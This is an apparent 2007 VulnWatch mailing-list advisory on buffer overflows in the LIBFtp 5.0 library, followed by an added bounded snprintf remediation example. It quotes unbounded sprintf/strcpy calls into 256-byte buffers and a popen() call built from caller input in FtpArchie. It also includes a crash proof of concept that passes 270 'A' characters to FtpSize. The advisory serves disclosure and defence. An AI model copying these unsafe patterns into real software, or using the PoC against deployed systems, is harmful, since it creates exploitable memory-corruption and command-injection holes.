| To: | vulnwatch <vulnwatch@vulnwatch.org> |
|---|---|
| Subject: | [VulnWatch] LIBFtp 5.0 (sprintf(), strcpy()) Multiple local buffer overflow |
| From: | "starcadi starcadi" <starcadi@gmail.com> |
| Date: | Thu, 15 Mar 2007 20:43:09 +0100 |

http://www.netsw.org/net/ip/filetrans/ftp/libftp/

Description

The library has multiple (sprintf(), strcpy()) buffer overflows in various functions.

Source errors

fvuln = FtpArchie() FtpDebugDebug() FtpOpenDir() FtpSize()

FtpString is a typedef of an array of 256 bytes:

    FtpLibrary.h: typedef char FtpString[256];
    ..
    STATUS FtpChmod(FTP *ftp,char *file,int mode)
    {
        FtpString msg;
        sprintf(msg,"SITE CHMOD %03o %s",mode,file);
        return FtpCommand(ftp,msg,"",200,EOF);
    }
    ..
    int FtpArchie ( char *what, ARCHIE *result, int len)
    {
        FILE *archie;
        FtpString cmd,tmp;
        int i;
        bzero(result,sizeof(result[0])*len);
        sprintf(cmd,"archie -t -l -m %d %s",len,what);
        if ((archie = popen(cmd,"r"))==NULL)
            return 0;
    ..
    STATUS FtpDebugDebug(FTP *ftp,int n, char * Message)
    {
        FtpString tmp;
        strcpy(tmp,Message);
        if (strncmp(tmp,"PASS ",5)==0)
        {
            char *p=tmp+5;
            while ( *p != '\0') *p++='*';
        };
    ..
    STATUS FtpOpenDir(FTP * con,char * file)
    {
        FtpString command;
        if ( file == NULL || *file == '\0' )
            strcpy(command,"NLST");
        else
            sprintf(command,"NLST %s",file);
        return FtpCommand(con,command,"",120,150,200,EOF);
    }
    ..
    int FtpSize(FTP * con, char *filename)
    {
        FtpString tmp;
        int i,size;
        strcpy(tmp,"SIZE ");
        strcat(tmp,filename);
        if ( FtpSendMessage(con,tmp) == QUIT )
            return EXIT(con,QUIT);
    ..

POC

    #include <stdlib.h>
    #include <string.h>
    #include <FtpLibrary.h>

    #define OVF_BUF (270)

    int main()
    {
        char *buf;

        buf = (char *) malloc(OVF_BUF+1);
        memset(buf, 'A', OVF_BUF);
        buf[OVF_BUF] = '\0'; /* terminate the string; malloc() does not zero memory */
        // insert function to init ftp connection..
        // insert function to manage ftp connection..
        // calling vulnerable function example FtpSize()
        FtpSize(NULL, buf);
        // insert function to close ftp connection..
        return(0);
    }

--
~ starcadi
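
A bounded alternative to the sprintf()/strcpy()/strcat() command building quoted in the advisory, as an added example that is not part of the original post or of LIBFtp. Only the FtpString typedef comes from the page; ftp_build_cmd() and demo_oversized_is_rejected() are hypothetical names, and the 270-byte input is constructed to match the PoC's length.

```c
#include <stdio.h>
#include <string.h>

typedef char FtpString[256];            /* same typedef as FtpLibrary.h */

/* Hypothetical helper: format "<verb>" or "<verb> <arg>" into an FtpString.
 * Returns the command length, or -1 if it does not fit. A truncated FTP
 * command would name the wrong file, so nothing partial is left behind.
 * Note: 'out' decays to char*, so the bound is sizeof(FtpString), not
 * sizeof(out). */
int ftp_build_cmd(FtpString out, const char *verb, const char *arg)
{
    int n;
    if (out == NULL || verb == NULL)
        return -1;
    if (arg == NULL || *arg == '\0')
        n = snprintf(out, sizeof(FtpString), "%s", verb);
    else
        n = snprintf(out, sizeof(FtpString), "%s %s", verb, arg);
    if (n < 0 || (size_t)n >= sizeof(FtpString)) {
        out[0] = '\0';
        return -1;
    }
    return n;
}

/* Constructed input: a 270-byte name, the length used in the advisory's PoC.
 * Returns 1 if the call is rejected and the guard bytes are untouched. */
int demo_oversized_is_rejected(void)
{
    struct { FtpString cmd; unsigned char guard[8]; } s;
    char name[271];
    int rc;
    size_t i;
    memset(name, 'A', 270);
    name[270] = '\0';
    memset(s.guard, 0x5a, sizeof s.guard);
    rc = ftp_build_cmd(s.cmd, "SIZE", name);
    for (i = 0; i < sizeof s.guard; i++)
        if (s.guard[i] != 0x5a)
            return 0;
    return rc == -1 && s.cmd[0] == '\0';
}

int main(void)
{
    printf("oversized rejected: %d\n", demo_oversized_is_rejected());
    return 0;
}
```

The same helper covers the "NLST" and "SITE CHMOD" style commands; callers must treat -1 as an error rather than sending an empty command.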